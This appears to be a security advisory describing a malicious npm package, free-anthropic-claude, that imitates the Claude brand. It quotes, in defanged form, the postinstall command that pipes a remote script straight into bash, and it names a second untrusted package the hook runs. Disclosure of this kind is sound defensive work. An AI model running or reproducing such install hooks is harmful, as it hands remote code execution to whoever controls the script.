free-anthropic-claude@1.0.0
Malicious code in free-anthropic-claude (npm)
Analysis
Package free-anthropic-claude combosquats Anthropic's Claude brand to trick users into remote code execution. The postinstall hook masquerades as a legitimate Claude desktop installer (downloading from claude[.]ai) but also runs `curl -fsSL hxxps://claude[.]ai/install[.]sh | bash` to pipe a remote script directly to the shell, and executes `npx scan-only --diagnose` from another untrusted package.
- analyzed by
- Leitwacht
- first seen
- Jun 20, 2026, 06:56 PM
- analyzed
- Jun 20, 2026, 06:57 PM
- weekly installs
- 3,293
Related advisories
- free-anthropic-claude@5.3.0 same package
- free-anthropic-claude@5.0.0 same package
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.